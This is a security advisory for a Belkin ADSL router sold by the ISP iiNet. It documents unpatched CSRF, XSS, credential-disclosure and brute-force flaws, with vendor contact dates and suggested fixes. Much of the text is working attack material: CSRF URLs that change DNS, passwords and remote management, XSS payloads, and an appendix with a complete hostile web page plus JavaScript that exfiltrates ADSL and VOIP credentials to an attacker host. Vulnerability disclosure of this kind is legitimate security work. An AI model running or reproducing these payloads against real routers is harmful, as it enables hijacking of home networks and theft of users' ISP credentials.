Home News Advisories

Belkin Broadband Voice Modem/Router - wireless 4 port - F1PI242EGau multiple vulnerabilities

Multiple vulnerabilities exist in the Belkin F1PI242EGau (wireless 4 port) router distributed by Australian ISP iiNet which could allow an attacker complete control over the user's router if the user browses a malicious web page.

CSRF and XSS issues in the web administration interface lead to denial of service, information disclosure and DNS Hijacking.

The iiNet distribution uses a customized web interface, however other distributions of the same router may all so be vulnerable.

If the router has the default "admin" password, or a user has an authenticated session with the router, an attacker may gain access to sensitive information if the user browses a malicious web page. Also, with enough time, the password could possibly be brute-forced.

Both the user's ISP account and router could be hijacked. As a result, an attacker could remotely manage the device and hijack user's web requests by hijacking DNS.

Device

Router Model Name: F1PI242EGau (Distributed by iiNet)
Runtime Code Version: 1.00.002 (Aug 6 2008)
http://www.belkin.com/au/support/article/?lid=ena&pid=F1PI242EGau&aid=10259

Model Specific: Other models and ISP distributions are likely to be vulnerable.

Manufacturer site: http://www.belkin.com.au/

Default IP: http://10.1.1.1/
Default Host: http://iinet.iad/
Default Password: admin
Default session timeout: 0 minutes (no timeout)

CSRF without authorized session

Denial of service. Restarts router and resets system time and security log http://iinet.iad/?n=------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Login if password "admin". This does NOT log out an authorized session if "admin" is incorrect. http://iinet.iad/cgi-bin/login.exe?pws=admin

CSRF with authorized session

Once authorized the following CSRF are possible: (more testing required however the entire control panel seems vulnerable) set dns to 192.168.1.1 and 192.168.1.1 http://iinet.iad/cgi-bin/setup_dns.exe?dns2_1=192&dns2_2=168&dns2_3=1&dns2_4=1&dns1_1=192&dns1_2=168&dns1_3=1&dns1_4=1&dns2_1_t=192&dns2_2_t=168&dns2_3_t=1&dns2_4_t=1 set dns as default isp dns http://iinet.iad/cgi-bin/setup_dns.exe?dns2_1=192&dns2_2=168&dns2_3=1&dns2_4=1&auto_from_isp=1 change password from admin to admin1 http://iinet.iad/cgi-bin/setup_pass.exe?userOldPswd=admin&userNewPswd=admin1&userConPswd=admin1 enable remote management on port 8080 http://iinet.iad/cgi-bin/setup_remote_mgmt.exe?r_mgnt_port=8080&check=1 enable wireless http://iinet.iad/cgi-bin/wireless_eb.exe?Wireless_enable=1 disable wireless http://iinet.iad/cgi-bin/wireless_eb.exe?Wireless_enable=0 logout http://192.168.1.254/cgi-bin/logout.exe

XSS with authorized session

Once authorized the following XSS are possible:

persistent: http://iinet.iad/cgi-bin/setup_ddns.exe?ddns_domainame="><script>alert(1);</script><"&ddns_account="><script>alert(2);</script><" http://iinet.iad/cgi-bin/aoschadd.exe?RuleName=";alert(1);a="&RuleComment=<!--";alert(2);a=" http://iinet.iad/cgi-bin/setup_pass.exe?restart_page=alert(1)&location_page=wait.stm http://iinet.iad/cgi-bin/setup_remote_mgmt.exe?restart_page=alert(1)&location_page=wait.stm http://iinet.iad/cgi-bin/setup_pass.exe?restart_page=alert(1)&location_page=wait.stm http://iinet.iad/cgi-bin/setup_dns.exe?restart_page=alert(1)&location_page=wait.stm http://iinet.iad/cgi-bin/setup_nat_show.exe?restart_page=alert(1)&location_page=wait.stm http://iinet.iad/cgi-bin/ntp_setting.exe?restart_page=alert(1)&location_page=wait.stm reflected (works in firefox 3.0.5 but not IE7): http://iinet.iad/<script>alert(1)</script>

Information Disclosure

Once authorized iinet_wizard.stm discloses VOIP and ADSL username and password in javascript function dhcp_renew() and html body, as follows:

function dhcp_renew():

function dhcp_renew() { if (document.forms[0].adsl_username.value!="username") { alert('Username has been changed and not being saved. \nPlease SAVE SETTINGS first!'); return false; } if (document.forms[0].adsl_pwd.value!="password") { alert('Password has been changed and not being saved. \nPlease SAVE SETTINGS first!'); return false; } return true; }

html:

<td width="16%" class=normalText>Password:</td> <td width="30%" class=normalText><input type="password" name="adsl_pwd" size="25" maxlength="67" value="username"></td> <td width="16%" class=normalText>Username:</td> <td width="30%" class=normalText><input type="text" name="adsl_username" size="30" maxlength="131" value="password"></td>

Authentication Bruteforce

Passwords can be brute forced due to a combination of factors:

* The hostname is predictable [http://iinet.iad/] if the user has DNS set to the router [10.1.1.1 by default]
* /cgi-bin/login.exe?pws= paramater is vulnerable to CSRF
* There is no account lockout for incorrect login attempts by default
* A user session is not logged out if an incorrect password is passed to the "pws" paramater

With enough time an attacker could brute force the user's password, using a method similar to the following:

<img src="http://iinet.iad/cgi-bin/login.exe?pws=aaaaaa"> <img src="http://iinet.iad/cgi-bin/login.exe?pws=aaron"> <img src="http://iinet.iad/cgi-bin/login.exe?pws=aardvark"> <img src="http://iinet.iad/cgi-bin/login.exe?pws=admin"> <img src="http://iinet.iad/cgi-bin/login.exe?pws=...">

It is also possible to bruteforce the router password once authorized using /cgi-bin/setup_pass.exe

http://iinet.iad/cgi-bin/setup_pass.exe?userOldPswd=admin2&userNewPswd=admin&userConPswd=admin
this will return different results depending on userOldPswd being correct or incorrect

Solution

Vendor : Belkin & iiNet

Notified :
2009-01-01 - iiNet & Belkin - No response
2009-01-20 - US CERT - No response from vendor

Fix : None at this time

Suggested Fix:

* Provide routers with a better default password, such as the MAC address
* Advise users to always log out and to change the default password, not just in the remote management page, but also in the help guides:
https://iihelp.iinet.net.au/Setting_up_an_iiNet_Belkin_router
https://iihelp.iinet.net.au/setting_up_a_broadband_modem_or_router
* set default timeout to less than 10 minutes

Reference

OWASP: Cross Site Request Forgery

OWASP: Cross Site Scripting

OWASP: Default Passwords

OWASP: Denial of Service

OWASP: Information Disclosure

Appendix

[H]iiJack : http://attacker/hiijack.html

<!-- [H]iiJack Belkin F1PI242EGau Remote DoS, pw theft & DNS hijack Brendan Coles <bcoles@gmail.com> 2009-05-04 Tested in IE7 and Firefox 3.0.5 Assumes password 'admin', 'admin1', 'password' or user already authorized. Payload executed after 10 seconds & the router will reset after 30 seconds if the user remains on the page. --> <html><head><title></title><style>img,iframe{width:1;height:1;overflow:hidden;border:0;}</style></head> <!-- wait 10 seconds then load our xssed page and remote js. --> <body onload='setTimeout("document.getElementById(\"z\").src=\"http://iinet.iad/ddns_main.stm\"", 10000);' <!-- login if user isn't authed - try several times in case the router is not cached in browser - can't hurt. --> <iframe id="z" src='http://iinet.iad/images/title_2.gif' scrolling="no"height="1"width="1"></iframe> <img height=1 src='http://iinet.iad/cgi-bin/login.exe?pws=admin'> <img height=1 src='http://iinet.iad/cgi-bin/login.exe?pws=password'> <img height=1 src='http://iinet.iad/cgi-bin/login.exe?pws=admin'> <img height=1 src='http://iinet.iad/cgi-bin/login.exe?pws=admin1'> <!-- inject --> <img height=1 src='http://iinet.iad/cgi-bin/setup_ddns.exe?ddns_domainame="><script src="http://192.168.1.1/a.js"></script><b"'> <!-- change password to admin1 --> <img height=1 src='http://iinet.iad/cgi-bin/setup_pass.exe?userOldPswd=admin&userNewPswd=admin1&userConPswd=admin1'> <!-- enable remote management on port 8080 --> <img height=1 src='http://iinet.iad/cgi-bin/setup_remote_mgmt.exe?r_mgnt_port=8080&check=1'> <!-- set dns to attacker --> <img height=1 src='http://iinet.iad/cgi-bin/setup_dns.exe?dns2_1=192&dns2_2=168&dns2_3=1&dns2_4=1&dns1_1=192&dns1_2=168&dns1_3=1&dns1_4=1&dns2_1_t=192&dns2_2_t=168&dns2_3_t=1&dns2_4_t=1'> <!-- reset the router after 30 seconds --> <iframe id="a" onload='setTimeout("document.getElementById(\"a\").src=\"http://iinet.iad/?n=------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\"", 30000);' scrolling="no"height="1"width="1"></iframe> </body></html>

Remote Javascript : http://attacker/a.js

var xmlhttp=null; var results=""; var dom=document.createElement('b'); function xfer(param) { var i=new Image; i.src="http://attacker/a.gif?"+param; dom.appendChild(i); } if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); } else if (window.ActiveXObject) { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } if (xmlhttp==null) { } xmlhttp.open("GET", "http://iinet.iad/iinet_wizard.stm", true); xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4) { var response = xmlhttp.responseText; var lines = response.split("\n"); for (var i=0; i<lines.length; i++) { if (lines[i].search(/="";/gi) == -1) { if (lines[i].search(/adsl_pwd.value!=/gi) > -1) results += "("+lines[i].replace("if (document.forms[0].adsl_", ""); if (lines[i].search(/adsl_username.value!=/gi) > -1) results += "("+lines[i].replace("if (document.forms[0].adsl_", ""); if (lines[i].search(/sip_username\[[0-9]\]/gi) > -1) results += lines[i]; if (lines[i].search(/sip_password\[[0-9]\]/gi) > -1) results += lines[i]; if (lines[i].search(/wan_ip=/gi) > -1) results += lines[i]; if (lines[i].search(/wan_subnet_mask=\[[0-9]\]/gi) > -1) results += lines[i]; if (lines[i].search(/wan_gateway=/gi) > -1) results += lines[i]; if (lines[i].search(/primary_dns/gi) > -1) results += lines[i]; if (lines[i].search(/secondary_dns=/gi) > -1) results += lines[i]; if (lines[i].search(/lan_gateway_ip=/gi) > -1) results += lines[i]; if (lines[i].search(/lan_gateway_mask=/gi) > -1) results += lines[i]; } } xfer(escape(results)); } } xmlhttp.send(null);